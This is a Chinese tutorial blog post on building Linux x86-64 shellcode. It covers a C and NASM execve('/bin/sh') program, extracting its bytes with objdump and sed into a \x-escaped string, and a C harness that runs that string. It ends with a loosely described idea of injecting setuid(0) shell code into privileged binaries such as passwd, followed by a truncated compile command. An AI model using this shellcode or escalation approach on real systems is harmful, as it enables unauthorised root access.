前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Linux 系统下提取 ShellCode

Linux 系统下提取 ShellCode

作者头像
微软技术分享
发布2022-12-28 16:10:13
1.2K0
发布2022-12-28 16:10:13
举报
文章被收录于专栏:Linux 系统运维技术实践

1.使用C语言编写一个获得系统Shell的小程序。

代码语言:javascript
复制
#include <unistd.h>

int main()
{
    char * shell[2];
    shell[0]="/bin/sh";
    shell[1]=NULL;
    execve(shell[0],shell,NULL);
}

编译并运行后,能够回弹Shell

代码语言:javascript
复制
[root@localhost ~]# gcc -c lyshark.c 
[root@localhost ~]# gcc -o shell lyshark.o
[root@localhost ~]# ./shell 
sh-4.2# ls

如果需要提取shellcode的话应该使用汇编来写提权代码,如下代码就是一段提权代码。64位系统堆栈结构已经变得和32位大不相同了

代码语言:javascript
复制
[root@localhost ~]# vim shell.S

section .text
  global _start
    _start:
      push rax
      xor rdx, rdx
      xor rsi, rsi
      mov rbx,'/bin//sh'
      push rbx
      push rsp
      pop rdi
      mov al, 59
      syscall

编译并运行,此处使用nasm 编译

代码语言:javascript
复制
[root@localhost ~]# yum install -y nasm
[root@localhost ~]# nasm -f elf64 shell.S -o shell.o
[root@localhost ~]# ld shell.o -o shell
[root@localhost ~]# ./shell 
[root@localhost root]# ls

发现能够获取到Root目录的权限,接着直接查询生成的机器码。

代码语言:javascript
复制
[root@localhost ~]# objdump -d shell
shell:     file format elf64-x86-64
Disassembly of section .text:

0000000000400080 <_start>:
  400080:       50                      push   %rax
  400081:       48 31 d2                xor    %rdx,%rdx
  400084:       48 31 f6                xor    %rsi,%rsi
  400087:       48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx
  40008e:       2f 73 68
  400091:       53                      push   %rbx
  400092:       54                      push   %rsp
  400093:       5f                      pop    %rdi
  400094:       b0 3b                   mov    $0x3b,%al
  400096:       0f 05                   syscall

直接使用sed工具过滤出这些东西,如下,非常简单。

代码语言:javascript
复制
[root@localhost ~]# objdump -d shell | grep "[0-9a-f]" | grep -v "file" | cut -f2 -d: \
| cut -f1-6 -d' '| tr -s ' '| tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g' | paste -d '' -s | \
 sed 's/^/"/' | sed 's/$/"/g'

"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

接着就是测试这段代码的可用性了,如下代码;

代码语言:javascript
复制
#include <stdio.h>
#include <string.h>

char *shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
 
int main(void)
{
    fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
    return 0;
}

代码提权思路,下面这段代码配合 chmod u+s 权限的设置,可以提权,我们可以将这段代码的汇编格式提取出来,然后将其注入到passwd等具有特权指令的目录下,然后就能完成权限的提升了。

代码语言:javascript
复制
#include <stdio.h>  
int main(){  
setuid(0);  
execve("/bin/sh",NULL,NULL);  
}

gcc -m64 -z execstack -fno-stack-protector -o 
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-08-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云开发 CloudBase
云开发(Tencent CloudBase,TCB)是腾讯云提供的云原生一体化开发环境和工具平台,为200万+企业和开发者提供高可用、自动弹性扩缩的后端云服务,可用于云端一体化开发多种端应用(小程序、公众号、Web 应用等),避免了应用开发过程中繁琐的服务器搭建及运维,开发者可以专注于业务逻辑的实现,开发门槛更低,效率更高。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档